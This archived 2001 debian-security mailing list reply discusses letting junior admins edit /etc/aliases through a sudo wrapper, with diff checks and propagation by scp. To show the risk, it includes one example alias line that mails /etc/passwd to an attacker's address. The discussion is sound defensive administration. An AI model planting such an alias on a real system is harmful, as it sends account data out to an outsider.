Re: VI wrapper for SUDO? - aliases

To: Joshua Goodall <joshua@myinternet.com.au>
Cc: Christoph Ulrich Scholler <scholler@fnb.tu-darmstadt.de>, debian-security@lists.debian.org
Subject: Re: VI wrapper for SUDO? - aliases
From: Alvin Oga <aoga@Maggie.Linux-Consulting.com>
Date: Fri, 30 Nov 2001 14:48:29 -0800 (PST)
Message-id: <[🔎] Pine.LNX.3.96.1011130143824.1682A-100000@Maggie.Linux-Consulting.com>
In-reply-to: <[🔎] 20011130223425.A5601@myinternet.com.au>


hi joshua...

/etc/aliases... what can we do with it...

i dont know if this was bill's original intent or not

but lets see what can (regular) people do with /etc/aliases

/etc/aliases
	badthing:	mail -s "send me the passwd"  hacker@hotmail.com \
			< /etc/passwd

but since the persons allowed to edit the /etc/aliases file is internal
anyway .. dont think we have to worry about that kind of stuff

if the company is 500 people with people leaving and coming onboard
and if there are jr admins... let them add/delete the people
from "all" or "sales" or "engineering" or "managers" etc...
	- in this case ..the sudo wrapper/editor script is good

	and the script can also propagate the /etc/aliases file to
	each machine that needs to have the aliases file kept current

	root@Slaves # sucpaliases -scp
		where it does ( and only if its out-of-date )
		" scp MasterCopy:/etc/aliases /etc ; newaliases "

the wrapper script can also do the difff and/or run newaliases
depending on your level of paranoia of the ones allowed to run
this "sudo alias script"
	- nothing happens till *you* run new aliases...which i would
	do myself if i was responsible... but id do a diff between
	the new one and the previously tested/good version

have fun linuxing
alvin


On Fri, 30 Nov 2001, Joshua Goodall wrote:

> That is a fair point but addressable with post-editing checks
> in the wrapper. Of course, one is exceedingly vulnerable to
> race conditions if one is not very careful about what is read and
> when.
> 
> You don't have to use vi; there are dumber editors in the world.
> 
> Maybe you should just have some programmatic (i.e. commandline,
> not full-screen) editing program for aliases that's callable from sudo.
> 
> However the whole idea fills me with worry; /etc/aliases IS quite a critical
> file and I'm certain that specific attacks could be engineered
> against you if write access was obtained.
> 
> Why not just have users make their changes and mail a diff to
> the sysadmin for approval :)
> 
> J
> 
> p.s. failing that, investigate LIDS; but that's a different ball game.
>

Reply to:

References:
- Re: VI wrapper for SUDO?
  - From: Joshua Goodall <joshua@myinternet.com.au>

Prev by Date: Re: home directory permission
Previous by thread: Re: VI wrapper for SUDO?
Next by thread: What is the status with wu-ftpd updated potato packages?
Index(es):
- Date
- Thread